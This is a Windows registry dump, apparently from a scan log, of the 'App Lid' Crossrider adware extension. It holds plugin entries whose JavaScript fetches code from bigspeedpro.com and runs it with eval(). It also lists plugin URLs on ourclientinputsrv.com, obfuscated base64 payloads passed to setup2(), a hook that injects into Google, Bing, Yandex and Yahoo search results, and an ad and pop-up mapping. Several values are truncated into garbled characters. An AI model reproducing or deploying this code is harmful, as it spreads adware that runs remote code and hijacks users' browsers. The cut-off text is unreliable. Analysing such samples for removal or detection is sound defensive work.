"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,Å–"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"AppName" = "App Lid-bg.exe"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\354]
"Version" = "2"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\182]
"Version" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMDAwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBhNGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMzMzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2YyMjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMzUzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRlNTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZDE1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMyYzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMmQzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1NjRjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\64]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/64.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\184]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/184.js"

[HKCU\Software\AppDataLow\Software\App Lid\Code]
"NewTabJavaScript" = ""

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppName" = "App Lid-codedownloader.exe"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\104]
"Version" = "14"

[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"CodeDownloadDomain" = "http://js.ourclientinputsrv.com"

[HKCU\Software\AppDataLow\Software\App Lid\Code]
"BgJavaScript" = "appAPI.ready(function($) { window.affid = appAPI.installer.getParams().uzid !== '0' ? appAPI.installer.getParams().uzid : appshatmadness; var buttonState = true; appAPI.browserAction.setResourceIcon('19x19.png'); appAPI.browserAction.setTitle('Browse Apps Hat'); appAPI.browserAction.onClick(function() { if (buttonState) { appAPI.tabs.create('http://www.appshat.com/home'); } buttonState = !buttonState; }); appAPI.request.get({ url: http://www.bigspeedpro.com/nero/js/crossrider/nero_background_options.js, onSuccess: function(response) { eval(response); } });});"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"Policy" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\242]
"Version" = "4"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\40]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/40.js"

[HKCU\Software\AppDataLow\Software\App Lid\Code]
"AppJavaScript" = "appAPI.ready(function ($) { appAPI.request.get({ url: document.location.protocol //www.bigspeedpro.com/nero/js/crossrider/nero_crossrider_cs.js, onSuccess: function(response) { eval(response); }, onFailure: function(httpCode) { console.log('Failed to retrieve content' , httpCode); } });});"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\207]
"Version" = "2"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"AppName" = "App Lid-buttonutil.exe"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\78]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/78.js"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"Policy" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nÅ–"

[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"zdata" = "appshatmadness"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"Policy" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\21]
"Name" = "debug"
"Version" = "5"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\7]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/7.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""

[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\44]
"Version" = "6"

[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"StatsDomain" = "http://stats.ourclientinputsrv.com"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\21]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/21.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\102]
"Name" = "dealply_m"
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2NzUxNTI0MjUyNGUwYzA0MWUwOTM4MDMxZTQwNDg0YzQ2MTgxZTBkMWQ0YjVkNGQxYjQyMDcwMjA4MWYwNzAyNWMwYjFjMGEwYjVmMDkwYjBmMTc1ZDA4MTMxYTA1MDMwOTBiMDQwMTA2NGMxODFmNWIxMzAyMTgwMzFmMTcwZTRmMGYxNjE0MTgyNjMyMmUzMTMwM2QzZjM3MjIyMzNkMjgyMzJkMjcyYTM4MjEzZTJlM2MyOTJlMjEzNzMwMzMyZDM0MzUyNjRiMTAwMjEyMjYwNTEwMWMwZjQ0MzIyZTMxMzAzZDNmMzcyMjIzM2QyODIzMmQyMzIyM2MzYjNlMmIzNDI4MmUyZDQ0MWEwNTAwNGQzNTI2MmUyMzNkMzEyMTNlMmQzNDJmMmIzMjI0MjEyNzIwMzMyZDM0MzUyNjRmNWQ3ODQyNTI0YzQ0NTIwMjBkMTkwMTAxMzcwMDAwNDY0YTRhNWIwNTA1MDYxMjAxNTY0YjVmMDMyNjBlMDMxMDA0MTgxZjNiMTkwNDFmMDI1ZjA2MGUwMTBmMDAxZTQ0MWEwMjFjNWQwMTAwMGUwMjVmMDAxODFiMTAwMTAxMDAwNTE0MDQ0NDEzMWU0ZTExMGExMzAyMGExNTA2NDQwZTAzMTYxMDJkMzMzYjMzMzgzNjNlMjIyMDJiMzYyOTM2MmYyZjIxMzkzNDNjMjYzNzI4M2IyMzNmM2IzMjM4MzYzZDJkNGEwNTAwMWEyZDA0MDUxZTA3NGYzMzNiMzMzODM2M2UyMjIwMmIzNjI5MzYyZjJiMjkzZDJlM2MyMzNmMjkzYjJmNGMxMTA0MTU0ZjNkMmQyZjM2M2YzOTJhM2YzODM2MjcyMDMzMzEyMzJmMmIzMjM4MzYzZDJkNGU0ODdhNGE1OTRkNTE1MDEyMWUxOTAzMTkwNDMwMDk1MzQ4NDI0MzVjNTY3YTE3', 'ymqrbrldpj'); }"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\14]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/14.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\41]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/41.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }SÅ–"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\288]
"Name" = "firstoffer_pricecomp_m"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"Policy" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\91]
"JavaScript" = "(function(M){var A=[].slice;var z={};var a=function(at){if(typeof at==string&&typeof at.trim==function){return at.trim();}return at==null?:at.toString().replace(/^\s /,).replace(/\s $/,);};function f(at){var au=z[at]={},av,aw;at=at.split(/\s /);for(av=0,aw=at.length;av
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\281]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/281.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\36]
"Version" = "8"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\354]
"Name" = "categories"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\22]
"Name" = "resources"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"Publisher" = "Lid"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\177]
"Name" = "crossriderDashboard"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\104]
"Name" = "jollywallet_m"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\7]
"Name" = "hooks"
"Version" = "2"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"UninstallString" = "%Program Files% (x86)\App Lid\Uninstall.exe /fcp=1"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286]
"65743" = "App Lid"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\102]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/102.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\184]
"Name" = "noproblemppc_m"
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjA2Å–"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url@Å–"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
    "DisplayIcon" = "%Program Files% (x86)\App Lid\utils.exe"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\221]
    "Name" = "icm_downloads_m"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\45]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/45.js"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
    "AppName" = "App Lid-buttonutil.exe"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\45]
    "Name" = "IEOnRequest"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\38]
    "Version" = "4"

    [HKCU\Software\InstalledBrowserExtensions\25286\Status]
    "Installed" = "1"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
    "Policy" = "3"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\39]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/39.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "Manifest" = "NA"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
    "AppName" = "App Lid-buttonutil64.exe"
    "Policy" = "3"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "osName" = "7"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\345]
    "JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358],intext:[103,117,123,142,259,263,342,359,360],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371]};"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\45]
    "Version" = "4"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\44]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/44.js"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
    "AppName" = "App Lid-codedownloader.exe"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\255]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/255.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\94]
    "Version" = "2"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
    "WpadDecisionReason" = "1"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\182]
    "Name" = "openUrl"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
    "CrAppId" = "65743"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\183]
    "Name" = "tabsWrapper"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\262]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDI玕Ŗ"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\64]
    "Version" = "3"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\17]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/17.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "DisableIe" = "true"
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "Time" = "1422513827"
    "AdditionalInfo" = "{""asw"":[0, 1073750533, -2147483648, 0],""browser_name"":""ie""

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\263]
    "Name" = "intext_5_j_m"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
    "AppName" = "App Lid-buttonutil64.exe"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "subid" = "0"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\25286\Status]
    "Installed" = "1"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\262]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/262.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "DefaultBrowser" = "ie"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
    "AppName" = "App Lid-codedownloader.exe"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\4]
    "Version" = "5"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\288]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/288.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\253]
    "Version" = "2"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
    "AppPath" = "%Program Files% (x86)\App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\184]
    "Version" = "11"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\288]
    "Version" = "1"

    [HKCU\Software\InstalledBrowserExtensions\25286]
    "65743" = "App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\40]
